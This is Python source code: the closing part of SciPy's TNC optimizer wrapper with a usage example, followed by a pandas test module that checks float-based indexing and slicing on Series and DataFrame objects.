Newton (TNC) algorithm.
Options
-------
eps : float
Step size used for numerical approximation of the jacobian.
scale : list of floats
Scaling factors to apply to each variable. If None, the
factors are up-low for interval bounded variables and
        1+|x| for the others. Defaults to None.
offset : float
Value to subtract from each variable. If None, the
offsets are (up+low)/2 for interval bounded variables
and x for the others.
disp : bool
Set to True to print convergence messages.
maxCGit : int
Maximum number of hessian*vector evaluations per main
        iteration. If maxCGit == 0, the direction chosen is
        -gradient. If maxCGit < 0, maxCGit is set to
        max(1,min(50,n/2)). Defaults to -1.
maxiter : int
        Maximum number of function evaluations. If None, `maxiter` is
set to max(100, 10*len(x0)). Defaults to None.
eta : float
        Severity of the line search. If < 0 or > 1, set to 0.25.
Defaults to -1.
stepmx : float
Maximum step for the line search. May be increased during
call. If too small, it will be set to 10.0. Defaults to 0.
accuracy : float
Relative precision for finite difference calculations. If
<= machine_precision, set to sqrt(machine_precision).
Defaults to 0.
minfev : float
Minimum function value estimate. Defaults to 0.
ftol : float
        Precision goal for the value of f in the stopping criterion.
        If ftol < 0.0, ftol is set to 0.0. Defaults to -1.
xtol : float
Precision goal for the value of x in the stopping
criterion (after applying x scaling factors). If xtol <
0.0, xtol is set to sqrt(machine_precision). Defaults to
-1.
gtol : float
Precision goal for the value of the projected gradient in
the stopping criterion (after applying x scaling factors).
If gtol < 0.0, gtol is set to 1e-2 * sqrt(accuracy).
Setting it to 0.0 is not recommended. Defaults to -1.
rescale : float
Scaling factor (in log10) used to trigger f value
rescaling. If 0, rescale at each iteration. If a large
value, never rescale. If < 0, rescale is set to 1.3.
"""
_check_unknown_options(unknown_options)
epsilon = eps
maxfun = maxiter
fmin = minfev
pgtol = gtol
x0 = asfarray(x0).flatten()
n = len(x0)
if bounds is None:
bounds = [(None, None)] * n
if len(bounds) != n:
raise ValueError('length of x0 != length of bounds')
if mesg_num is not None:
messages = {0: MSG_NONE, 1: MSG_ITER, 2: MSG_INFO, 3: MSG_VERS,
4: MSG_EXIT, 5: MSG_ALL}.get(mesg_num, MSG_ALL)
elif disp:
messages = MSG_ALL
else:
messages = MSG_NONE
if jac is None:
def func_and_grad(x):
f = fun(x, *args)
g = approx_fprime(x, fun, epsilon, *args)
return f, g
else:
def func_and_grad(x):
f = fun(x, *args)
g = jac(x, *args)
return f, g
"""
low, up : the bounds (lists of floats)
if low is None, the lower bounds are removed.
if up is None, the upper bounds are removed.
low and up defaults to None
"""
low = zeros(n)
up = zeros(n)
for i in range(n):
if bounds[i] is None:
l, u = -inf, inf
else:
l, u = bounds[i]
if l is None:
low[i] = -inf
else:
low[i] = l
if u is None:
up[i] = inf
else:
up[i] = u
if scale is None:
scale = array([])
if offset is None:
offset = array([])
if maxfun is None:
maxfun = max(100, 10 * len(x0))
rc, nf, nit, x = moduleTNC.minimize(func_and_grad, x0, low, up, scale,
offset, messages, maxCGit, maxfun,
eta, stepmx, accuracy, fmin, ftol,
xtol, pgtol, rescale, callback)
funv, jacv = func_and_grad(x)
return OptimizeResult(x=x, fun=funv, jac=jacv, nfev=nf, nit=nit, status=rc,
message=RCSTRINGS[rc], success=(-1 < rc < 3))
if __name__ == '__main__':
# Examples for TNC
def example():
print("Example")
# A function to minimize
def function(x):
f = pow(x[0], 2.0) + pow(abs(x[1]), 3.0)
g = [0, 0]
g[0] = 2.0 * x[0]
g[1] = 3.0 * pow(abs(x[1]), 2.0)
if x[1] < 0:
g[1] = -g[1]
return f, g
# Optimizer call
x, nf, rc = fmin_tnc(function, [-7, 3], bounds=([-10, 1], [10, 10]))
print("After", nf, "function evaluations, TNC returned:", RCSTRINGS[rc])
print("x =", x)
print("exact value = [0, 1]")
print()
example()
# -*- coding: utf-8 -*-
import pytest
from warnings import catch_warnings
import numpy as np
from pandas import Series, DataFrame, Index, Float64Index
from pandas.util.testing import assert_series_equal, assert_almost_equal
import pandas.util.testing as tm
class TestFloatIndexers(object):
def check(self, result, original, indexer, getitem):
"""
comparator for results
we need to take care if we are indexing on a
Series or a frame
"""
if isinstance(original, Series):
expected = original.iloc[indexer]
else:
if getitem:
expected = original.iloc[:, indexer]
else:
expected = original.iloc[indexer]
assert_almost_equal(result, expected)
def test_scalar_error(self):
# GH 4892
# float_indexers should raise exceptions
# on appropriate Index types & accessors
# this duplicates the code below
        # but is specifically testing for the error
# message
for index in [tm.makeStringIndex, tm.makeUnicodeIndex,
tm.makeCategoricalIndex,
tm.makeDateIndex, tm.makeTimedeltaIndex,
tm.makePeriodIndex, tm.makeIntIndex,
tm.makeRangeIndex]:
i = index(5)
s = Series(np.arange(len(i)), index=i)
def f():
s.iloc[3.0]
tm.assert_raises_regex(TypeError,
'cannot do positional indexing',
f)
def f():
s.iloc[3.0] = 0
pytest.raises(TypeError, f)
def test_scalar_non_numeric(self):
# GH 4892
# float_indexers should raise exceptions
# on appropriate Index types & accessors
for index in [tm.makeStringIndex, tm.makeUnicodeIndex,
tm.makeCategoricalIndex,
tm.makeDateIndex, tm.makeTimedeltaIndex,
tm.makePeriodIndex]:
i = index(5)
for s in [Series(
np.arange(len(i)), index=i), DataFrame(
np.random.randn(
len(i), len(i)), index=i, columns=i)]:
# getting
for idxr, getitem in [(lambda x: x.ix, False),
(lambda x: x.iloc, False),
(lambda x: x, True)]:
def f():
with catch_warnings(record=True):
idxr(s)[3.0]
                    # getitem on a DataFrame is a KeyError as it is indexing
# via labels on the columns
if getitem and isinstance(s, DataFrame):
error = KeyError
else:
error = TypeError
pytest.raises(error, f)
# label based can be a TypeError or KeyError
def f():
s.loc[3.0]
if s.index.inferred_type in ['string', 'unicode', 'mixed']:
error = KeyError
else:
error = TypeError
pytest.raises(error, f)
# contains
assert 3.0 not in s
# setting with a float fails with iloc
def f():
s.iloc[3.0] = 0
pytest.raises(TypeError, f)
# setting with an indexer
if s.index.inferred_type in ['categorical']:
# Value or Type Error
pass
elif s.index.inferred_type in ['datetime64', 'timedelta64',
'period']:
# these should prob work
                    # and are inconsistent between series/dataframe ATM
# for idxr in [lambda x: x.ix,
# lambda x: x]:
# s2 = s.copy()
# def f():
# idxr(s2)[3.0] = 0
# pytest.raises(TypeError, f)
pass
else:
s2 = s.copy()
s2.loc[3.0] = 10
assert s2.index.is_object()
for idxr in [lambda x: x.ix,
lambda x: x]:
s2 = s.copy()
with catch_warnings(record=True):
idxr(s2)[3.0] = 0
assert s2.index.is_object()
            # falls back to positional selection, series only
s = Series(np.arange(len(i)), index=i)
s[3]
pytest.raises(TypeError, lambda: s[3.0])
def test_scalar_with_mixed(self):
s2 = Series([1, 2, 3], index=['a', 'b', 'c'])
s3 = Series([1, 2, 3], index=['a', 'b', 1.5])
# lookup in a pure string index
# with an invalid indexer
for idxr in [lambda x: x.ix,
lambda x: x,
lambda x: x.iloc]:
def f():
with catch_warnings(record=True):
idxr(s2)[1.0]
pytest.raises(TypeError, f)
pytest.raises(KeyError, lambda: s2.loc[1.0])
result = s2.loc['b']
expected = 2
assert result == expected
# mixed index so we have label
# indexing
for idxr in [lambda x: x.ix,
lambda x: x]:
def f():
with catch_warnings(record=True):
idxr(s3)[1.0]
pytest.raises(TypeError, f)
result = idxr(s3)[1]
expected = 2
assert result == expected
pytest.raises(TypeError, lambda: s3.iloc[1.0])
pytest.raises(KeyError, lambda: s3.loc[1.0])
result = s3.loc[1.5]
expected = 3
assert result == expected
def test_scalar_integer(self):
# test how scalar float indexers work on int indexes
# integer index
for index in [tm.makeIntIndex, tm.makeRangeIndex]:
i = index(5)
for s in [Series(np.arange(len(i))),
DataFrame(np.random.randn(len(i), len(i)),
index=i, columns=i)]:
# coerce to equal int
for idxr, getitem in [(lambda x: x.ix, False),
(lambda x: x.loc, False),
(lambda x: x, True)]:
with catch_warnings(record=True):
result = idxr(s)[3.0]
self.check(result, s, 3, getitem)
# coerce to equal int
for idxr, getitem in [(lambda x: x.ix, False),
(lambda x: x.loc, False),
(lambda x: x, True)]:
if isinstance(s, Series):
def compare(x, y):
assert x == y
expected = 100
else:
compare = tm.assert_series_equal
if getitem:
expected = Series(100,
index=range(len(s)), name=3)
else:
expected = Series(100.,
index=range(len(s)), name=3)
s2 = s.copy()
with catch_warnings(record=True):
idxr(s2)[3.0] = 100
result = idxr(s2)[3.0]
compare(result, expected)
result = idxr(s2)[3]
compare(result, expected)
# contains
# coerce to equal int
assert 3.0 in s
def test_scalar_float(self):
# scalar float indexers work on a float index
index = Index(np.arange(5.))
for s in [Series(np.arange(len(index)), index=index),
DataFrame(np.random.randn(len(index), len(index)),
index=index, columns=index)]:
# assert all operations except for iloc are ok
indexer = index[3]
for idxr, getitem in [(lambda x: x.ix, False),
(lambda x: x.loc, False),
(lambda x: x, True)]:
# getting
with catch_warnings(record=True):
result = idxr(s)[indexer]
self.check(result, s, 3, getitem)
# setting
s2 = s.copy()
def f():
with catch_warnings(record=True):
idxr(s2)[indexer] = expected
with catch_warnings(record=True):
result = idxr(s2)[indexer]
self.check(result, s, 3, getitem)
# random integer is a KeyError
with catch_warnings(record=True):
pytest.raises(KeyError, lambda: idxr(s)[3.5])
# contains
assert 3.0 in s
# iloc succeeds with an integer
expected = s.iloc[3]
s2 = s.copy()
s2.iloc[3] = expected
result = s2.iloc[3]
self.check(result, s, 3, False)
# iloc raises with a float
pytest.raises(TypeError, lambda: s.iloc[3.0])
def g():
s2.iloc[3.0] = 0
pytest.raises(TypeError, g)
def test_slice_non_numeric(self):
# GH 4892
# float_indexers should raise exceptions
# on appropriate Index types & accessors
for index in [tm.makeStringIndex, tm.makeUnicodeIndex,
tm.makeDateIndex, tm.makeTimedeltaIndex,
tm.makePeriodIndex]:
index = index(5)
for s in [Series(range(5), index=index),
DataFrame(np.random.randn(5, 2), index=index)]:
# getitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
def f():
s.iloc[l]
pytest.raises(TypeError, f)
for idxr in [lambda x: x.ix,
lambda x: x.loc,
lambda x: x.iloc,
lambda x: x]:
def f():
with catch_warnings(record=True):
idxr(s)[l]
pytest.raises(TypeError, f)
# setitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
def f():
s.iloc[l] = 0
pytest.raises(TypeError, f)
for idxr in [lambda x: x.ix,
lambda x: x.loc,
lambda x: x.iloc,
lambda x: x]:
def f():
with catch_warnings(record=True):
idxr(s)[l] = 0
pytest.raises(TypeError, f)
def test_slice_integer(self):
# same as above, but for Integer based indexes
# these coerce to a like integer
        # oob indicates whether we are out of bounds
# of positional indexing
for index, oob in [(tm.makeIntIndex(5), False),
(tm.makeRangeIndex(5), False),
(tm.makeIntIndex(5) + 10, True)]:
# s is an in-range index
s = Series(range(5), index=index)
# getitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
with catch_warnings(record=True):
result = idxr(s)[l]
# these are all label indexing
# except getitem which is positional
# empty
if oob:
indexer = slice(0, 0)
else:
indexer = slice(3, 5)
self.check(result, s, indexer, False)
# positional indexing
def f():
s[l]
pytest.raises(TypeError, f)
# getitem out-of-bounds
for l in [slice(-6, 6),
slice(-6.0, 6.0)]:
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
with catch_warnings(record=True):
result = idxr(s)[l]
# these are all label indexing
# except getitem which is positional
# empty
if oob:
indexer = slice(0, 0)
else:
indexer = slice(-6, 6)
self.check(result, s, indexer, False)
# positional indexing
def f():
s[slice(-6.0, 6.0)]
pytest.raises(TypeError, f)
# getitem odd floats
for l, res1 in [(slice(2.5, 4), slice(3, 5)),
(slice(2, 3.5), slice(2, 4)),
(slice(2.5, 3.5), slice(3, 4))]:
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
with catch_warnings(record=True):
result = idxr(s)[l]
if oob:
res = slice(0, 0)
else:
res = res1
self.check(result, s, res, False)
# positional indexing
def f():
s[l]
pytest.raises(TypeError, f)
# setitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
sc = s.copy()
with catch_warnings(record=True):
idxr(sc)[l] = 0
result = idxr(sc)[l].values.ravel()
assert (result == 0).all()
# positional indexing
def f():
s[l] = 0
pytest.raises(TypeError, f)
def test_integer_positional_indexing(self):
""" make sure that we are raising on positional indexing
w.r.t. an integer index """
s = Series(range(2, 6), index=range(2, 6))
result = s[2:4]
expected = s.iloc[2:4]
assert_series_equal(result, expected)
for idxr in [lambda x: x,
lambda x: x.iloc]:
for l in [slice(2, 4.0),
slice(2.0, 4),
slice(2.0, 4.0)]:
def f():
idxr(s)[l]
pytest.raises(TypeError, f)
def test_slice_integer_frame_getitem(self):
# similar to above, but on the getitem dim (of a DataFrame)
for index in [tm.makeIntIndex, tm.makeRangeIndex]:
index = index(5)
s = DataFrame(np.random.randn(5, 2), index=index)
for idxr in [lambda x: x.loc,
lambda x: x.ix]:
# getitem
for l in [slice(0.0, 1),
slice(0, 1.0),
slice(0.0, 1.0)]:
with catch_warnings(record=True):
result = idxr(s)[l]
indexer = slice(0, 2)
self.check(result, s, indexer, False)
# positional indexing
def f():
s[l]
pytest.raises(TypeError, f)
# getitem out-of-bounds
for l in [slice(-10, 10),
slice(-10.0, 10.0)]:
result = idxr(s)[l]
self.check(result, s, slice(-10, 10), True)
# positional indexing
def f():
s[slice(-10.0, 10.0)]
pytest.raises(TypeError, f)
# getitem odd floats
for l, res in [(slice(0.5, 1), slice(1, 2)),
(slice(0, 0.5), slice(0, 1)),
(slice(0.5, 1.5), slice(1, 2))]:
with catch_warnings(record=True):
result = idxr(s)[l]
self.check(result, s, res, False)
# positional indexing
def f():
s[l]
pytest.raises(TypeError, f)
# setitem
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
sc = s.copy()
with catch_warnings(record=True):
idxr(sc)[l] = 0
result = idxr(sc)[l].values.ravel()
assert (result == 0).all()
# positional indexing
def f():
s[l] = 0
pytest.raises(TypeError, f)
def test_slice_float(self):
# same as above, but for floats
index = Index(np.arange(5.)) + 0.1
for s in [Series(range(5), index=index),
DataFrame(np.random.randn(5, 2), index=index)]:
for l in [slice(3.0, 4),
slice(3, 4.0),
slice(3.0, 4.0)]:
expected = s.iloc[3:4]
for idxr in [lambda x: x.ix,
lambda x: x.loc,
lambda x: x]:
# getitem
with catch_warnings(record=True):
result = idxr(s)[l]
if isinstance(s, Series):
tm.assert_series_equal(result, expected)
else:
tm.assert_frame_equal(result, expected)
# setitem
s2 = s.copy()
with catch_warnings(record=True):
idxr(s2)[l] = 0
result = idxr(s2)[l].values.ravel()
assert (result == 0).all()
def test_floating_index_doc_example(self):
index = Index([1.5, 2, 3, 4.5, 5])
s = Series(range(5), index=index)
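        # On a float index, scalar lookups through [] and .loc are label-based
        # (3 is treated as the label 3.0), while .iloc stays positional.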
assert s[3] == 2
assert s.loc[3] == 2
assert s.loc[3] == 2
assert s.iloc[3] == 3
def test_floating_misc(self):
# related 236
# scalar/slicing of a float index
s = Series(np.arange(5), index=np.arange(5) * 2.5, dtype=np.int64)
# label based slicing
result1 = s[1.0:3.0]
result2 = s.loc[1.0:3.0]
result3 = s.loc[1.0:3.0]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
# exact indexing when found
result1 = s[5.0]
result2 = s.loc[5.0]
result3 = s.loc[5.0]
assert result1 == result2
assert result1 == result3
result1 = s[5]
result2 = s.loc[5]
result3 = s.loc[5]
assert result1 == result2
assert result1 == result3
assert s[5.0] == s[5]
        # value not found (and no falling back at all)
# scalar integers
pytest.raises(KeyError, lambda: s.loc[4])
pytest.raises(KeyError, lambda: s.loc[4])
pytest.raises(KeyError, lambda: s[4])
# fancy floats/integers create the correct entry (as nan)
# fancy tests
expected = Series([2, 0], index=Float64Index([5.0, 0.0]))
for fancy_idx in [[5.0, 0.0], np.array([5.0, 0.0])]: # float
assert_series_equal(s[fancy_idx], expected)
assert_series_equal(s.loc[fancy_idx], expected)
assert_series_equal(s.loc[fancy_idx], expected)
expected = Series([2, 0], index=Index([5, 0], dtype='int64'))
for fancy_idx in [[5, 0], np.array([5, 0])]: # int
assert_series_equal(s[fancy_idx], expected)
assert_series_equal(s.loc[fancy_idx], expected)
assert_series_equal(s.loc[fancy_idx], expected)
# all should return the same as we are slicing 'the same'
result1 = s.loc[2:5]
result2 = s.loc[2.0:5.0]
result3 = s.loc[2.0:5]
result4 = s.loc[2.1:5]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, result4)
# previously this did fallback indexing
result1 = s[2:5]
result2 = s[2.0:5.0]
result3 = s[2.0:5]
result4 = s[2.1:5]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, result4)
result1 = s.loc[2:5]
result2 = s.loc[2.0:5.0]
result3 = s.loc[2.0:5]
result4 = s.loc[2.1:5]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, result4)
# combined test
result1 = s.loc[2:5]
result2 = s.loc[2:5]
result3 = s[2:5]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
# list selection
result1 = s[[0.0, 5, 10]]
result2 = s.loc[[0.0, 5, 10]]
result3 = s.loc[[0.0, 5, 10]]
result4 = s.iloc[[0, 2, 4]]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, result4)
result1 = s[[1.6, 5, 10]]
result2 = s.loc[[1.6, 5, 10]]
result3 = s.loc[[1.6, 5, 10]]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, Series(
[np.nan, 2, 4], index=[1.6, 5, 10]))
result1 = s[[0, 1, 2]]
result2 = s.loc[[0, 1, 2]]
result3 = s.loc[[0, 1, 2]]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, Series(
[0.0, np.nan, np.nan], index=[0, 1, 2]))
result1 = s.loc[[2.5, 5]]
result2 = s.loc[[2.5, 5]]
assert_series_equal(result1, result2)
assert_series_equal(result1, Series([1, 2], index=[2.5, 5.0]))
result1 = s[[2.5]]
result2 = s.loc[[2.5]]
result3 = s.loc[[2.5]]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, Series([1], index=[2.5]))
def test_floating_tuples(self):
# see gh-13509
s = Series([(1, 1), (2, 2), (3, 3)], index=[0.0, 0.1, 0.2], name='foo')
result = s[0.0]
assert result == (1, 1)
expected = Series([(1, 1), (2, 2)], index=[0.0, 0.0], name='foo')
s = Series([(1, 1), (2, 2), (3, 3)], index=[0.0, 0.0, 0.2], name='foo')
result = s[0.0]
tm.assert_series_equal(result, expected)
def test_float64index_slicing_bug(self):
# GH 5557, related to slicing a float index
ser = {256: 2321.0,
1: 78.0,
2: 2716.0,
3: 0.0,
4: 369.0,
5: 0.0,
6: 269.0,
7: 0.0,
8: 0.0,
9: 0.0,
10: 3536.0,
11: 0.0,
12: 24.0,
13: 0.0,
14: 931.0,
15: 0.0,
16: 101.0,
17: 78.0,
18: 9643.0,
19: 0.0,
20: 0.0,
21: 0.0,
22: 63761.0,
23: 0.0,
24: 446.0,
25: 0.0,
26: 34773.0,
27: 0.0,
28: 729.0,
29: 78.0,
30: 0.0,
31: 0.0,
32: 3374.0,
33: 0.0,
34: 1391.0,
35: 0.0,
36: 361.0,
37: 0.0,
38: 61808.0,
39: 0.0,
40: 0.0,
41: 0.0,
42: 6677.0,
43: 0.0,
44: 802.0,
45: 0.0,
46: 2691.0,
47: 0.0,
48: 3582.0,
49: 0.0,
50: 734.0,
51: 0.0,
52: 627.0,
53: 70.0,
54: 2584.0,
55: 0.0,
56: 324.0,
57: 0.0,
58: 605.0,
59: 0.0,
60: 0.0,
61: 0.0,
62: 3989.0,
63: 10.0,
64: 42.0,
65: 0.0,
66: 904.0,
67: 0.0,
68: 88.0,
69: 70.0,
70: 8172.0,
71: 0.0,
72: 0.0,
73: 0.0,
74: 64902.0,
75: 0.0,
76: 347.0,
77: 0.0,
78: 36605.0,
79: 0.0,
80: 379.0,
81: 70.0,
82: 0.0,
83: 0.0,
84: 3001.0,
85: 0.0,
86: 1630.0,
87: 7.0,
88: 364.0,
89: 0.0,
90: 67404.0,
91: 9.0,
92: 0.0,
93: 0.0,
94: 7685.0,
95: 0.0,
96: 1017.0,
97: 0.0,
98: 2831.0,
99: 0.0,
100: 2963.0,
101: 0.0,
102: 854.0,
103: 0.0,
104: 0.0,
105: 0.0,
106: 0.0,
107: 0.0,
108: 0.0,
109: 0.0,
110: 0.0,
111: 0.0,
112: 0.0,
113: 0.0,
114: 0.0,
115: 0.0,
116: 0.0,
117: 0.0,
118: 0.0,
119: 0.0,
120: 0.0,
121: 0.0,
122: 0.0,
123: 0.0,
124: 0.0,
125: 0.0,
126: 67744.0,
127: 22.0,
128: 264.0,
129: 0.0,
260: 197.0,
268: 0.0,
265: 0.0,
269: 0.0,
261: 0.0,
266: 1198.0,
267: 0.0,
262: 2629.0,
258: 775.0,
257: 0.0,
263: 0.0,
259: 0.0,
264: 163.0,
250: 10326.0,
251: 0.0,
252: 1228.0,
253: 0.0,
254: 2769.0,
255: 0.0}
# smoke test for the repr
s = Series(ser)
result = s.value_counts()
str(result)
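# Hedged illustration (not one of the original tests): a minimal standalone
# sketch of the float-index semantics exercised above -- label-based scalar
# access on a Float64Index versus strictly positional ``.iloc`` access.  The
# data values are made up for demonstration.
def _float_index_semantics_sketch():
    s = Series([10, 20, 30], index=[0.0, 2.5, 5.0])
    assert s[2.5] == 20      # [] is label-based on a float index
    assert s.loc[2.5] == 20  # .loc is label-based
    assert s.iloc[1] == 20   # .iloc stays strictly positional
    return s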